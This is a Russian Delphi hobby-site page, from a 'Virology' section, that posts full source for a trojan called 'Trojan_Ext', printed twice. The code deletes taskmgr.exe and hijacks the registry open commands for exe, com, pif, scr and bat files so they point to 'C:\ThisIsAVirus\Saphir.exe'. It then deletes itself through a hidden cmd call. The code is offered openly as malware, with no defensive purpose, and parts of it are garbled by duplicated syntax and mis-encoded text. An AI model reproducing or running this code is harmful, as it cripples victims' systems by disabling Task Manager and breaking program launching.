Исходник функциональной программы на Delphi - Вирусология - Delphi - Каталог статей - Вирусология, взгляд из Delphi
Воскресенье, 04.12.2016, 06:55 Приветствую вас Гость | Группа "Гости" 


Меню сайта

Категории раздела
Вирусология [39]
Статьи о вирусах
Системные [0]
Работа с системой
Примеры [44]
Приёмы, функции, процедуры
Ceти [1]
Работа с интернет
Приколы [5]
Пишем шуточные програмки
Остальное [5]
Всё что не вошло

Администрация
000000 dolphin

Помощь проекту

R106276538945
Z160640024212

Яндекс деньги
410011190732605

Недавние темы

Опрос
Как вы нашли наш сайт?
Всего ответов: 354

Главная » Статьи » Delphi » Вирусология

Исходник функциональной программы на Delphi
И еще один исходник


var Buffer: array[0..1023] of Char

Buffer: [0..1023] Charreg: TRegistry;

winDir: String;

OurFile: array[0..MAX_PATH] of Char;

Cmd: String;

SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer)));

DeleteFile(PChar(WinDir+’\System32\taskmgr.exe’));

Reg:=TRegistry.Create;

Reg.LazyWrite:=false;

Reg.RootKey:=HKEY_CLASSES_ROOT;

Reg.OpenKey(’exefile\shell\Open\Command’,true);

Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);

Reg.CloseKey;

Reg.OpenKey(’piffile\shell\Open\Command’,true);

Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);

Reg.CloseKey;

Reg.OpenKey(’comfile\shell\Open\Command’,true);

Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);

Reg.CloseKey;

Reg.OpenKey(’scrfile\shell\Open\Command’,true);

Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);

Reg.CloseKey;

Reg.OpenKey(’batfile\shell\Open\Command’,true);

Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);

Reg.CloseKey;

Reg.Free;

try

if (GetModuleFileName(0, OurFile, MAX_PATH) <> 0) and (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) then

(GetModuleFileName(0, OurFile, MAX_PATH) <> 0) (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) begin

Cmd:= ‘/c del ‘ + ‘”‘+OurFile+’”‘ + ‘ >> NUL’;

if (GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) and (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) then

(GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) begin

Halt;

end;

end;

except

Halt;

end;

Aio e ana. Enoiaiee eae anaaaa i?eeaaaaony. Aio iieiue eia:

program Trojan_Ext;

Trojan_Ext; uses

Windows,Registry,ShellApi;

var Buffer: array[0..1023] of Char;

Buffer: [0..1023] Char;reg: TRegistry;

winDir: String;

OurFile: array[0..MAX_PATH] of Char;

Cmd: String;

begin

SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer)));

DeleteFile(PChar(WinDir+’\System32\taskmgr.exe’));

Reg:=TRegistry.Create;

Reg.LazyWrite:=false;

Reg.RootKey:=HKEY_CLASSES_ROOT;

Reg.OpenKey(’exefile\shell\Open\Command’,true);

Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);

Reg.CloseKey;

Reg.OpenKey(’piffile\shell\Open\Command’,true);

Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);

Reg.CloseKey;

Reg.OpenKey(’comfile\shell\Open\Command’,true);

Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);

Reg.CloseKey;

Reg.OpenKey(’scrfile\shell\Open\Command’,true);

Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);

Reg.CloseKey;

Reg.OpenKey(’batfile\shell\Open\Command’,true);

Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);

Reg.CloseKey;

Reg.Free;

try

if (GetModuleFileName(0, OurFile, MAX_PATH) <> 0) and (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) then

(GetModuleFileName(0, OurFile, MAX_PATH) <> 0) (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) begin

Cmd:= ‘/c del ‘ + ‘”‘+OurFile+’”‘ + ‘ >> NUL’;

if (GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) and (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) then

(GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) begin

Halt;

end;

end;

except

Halt;

end;

end.

Категория: Вирусология | Добавил: dolphin (27.09.2008)
Просмотров: 2318 | Комментарии: 2 | Рейтинг: 5.0/4

Всего комментариев: 2
avatar
1
Не испытывайте его дома! biggrin
avatar
2
Почему?
avatar
Профиль


Логин:
Пароль:

Поиск

Наша кнопка

Вирусология, взгляд из Delphi



Статистика
HSDN :: Рейтинг сайтов WOlist.ru - каталог качественных сайтов Рунета Яндекс.Метрика Счетчик тИЦ и PR
Статистика материалов
Файлов: 364
Форум: 1128/7979
Коментариев: 759
Новостей: 27

Статистика пользователей
Всего: 409
За неделю: 2
Вчера: 0
Сегодня: 0
Всего онлайн: 1
Гостей: 1
Пользователей: 0

delfcode.ru © 2008 - 2016 Хостинг от uCoz